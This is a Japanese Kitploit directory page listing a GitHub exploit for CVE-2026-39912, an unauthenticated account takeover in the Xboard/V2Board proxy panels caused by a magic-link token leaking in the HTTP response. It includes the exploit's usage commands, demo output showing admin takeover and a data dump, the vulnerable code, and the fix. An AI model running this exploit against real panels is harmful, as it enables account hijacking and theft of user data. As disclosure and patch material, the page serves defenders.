Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-39912 — Xboard / V2Board 未認証アカウント乗っ取り - マジックリンクトークン漏洩 (CVE-2026-39912) | Kitploit
ツール/GitHubGitHub/chocapikk/cve-2026-39912
偵察脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト認証
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board 未認証アカウント乗っ取り - マジックリンクトークン漏洩 (CVE-2026-39912)

リポジトリを見る
215ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2026-39912 - Xboard / V2Board 未認証アカウント乗っ取り

loginWithMailLink におけるマジックリンクトークンの漏洩

CVECVE-2026-39912
CVSS9.1 (重大)
CWECWE-201 (送信データへの機密情報の挿入)
影響を受けるバージョンV2Board >= 1.6.1 から 1.7.4 まで / Xboard 0.1.9+ までの全バージョン
修正状況未修正 (V2Board は2023年6月以降開発停止)
公開日2026-04-09
発見者Valentin Lobstein (Chocapikk)
Writeupchocapikk.com
修正PRV2Board #981 / Xboard #873

TL;DR

loginWithMailLink エンドポイントは、マジックログインリンクをメールでのみ送信する代わりに、HTTPレスポンスボディに直接返します。登録済みメールアドレスを知っている未認証の攻撃者は、管理者を含む任意のアカウントを2回のHTTPリクエストで乗っ取ることができます。

影響を受けるソフトウェア

  • V2Board - オープンソースのプロキシプロトコル管理パネル (8.7kスター、開発停止)
  • Xboard - V2Board のフォーク (4k+スター、活発にメンテナンス中)

どちらも主に中国で広く展開されているVPN/プロキシパネルです。ZoomEye によると、7,000以上のインスタンスがインターネット上に公開されています。

必要条件

  • 管理者設定で login_with_mail_link_enable が有効になっている必要がある (デフォルトでは無効)
  • 有効な登録済みメールアドレス

使用方法

root@kitploit:~
# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 [email protected]

# Save dump to file
python3 exploit.py http://target:7001 [email protected] -o dump.json

デモ

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

脆弱性の詳細

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token leaked to caller
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork

修正内容

root@kitploit:~
- return [true, $link];
+ return [true, true];

参考情報

  • V2Board - 脆弱なコード (71行目)
  • Xboard - 脆弱なコード (49行目)
  • 脆弱性を導入した元のコミット (2022-06-27)
ツールをダウンロード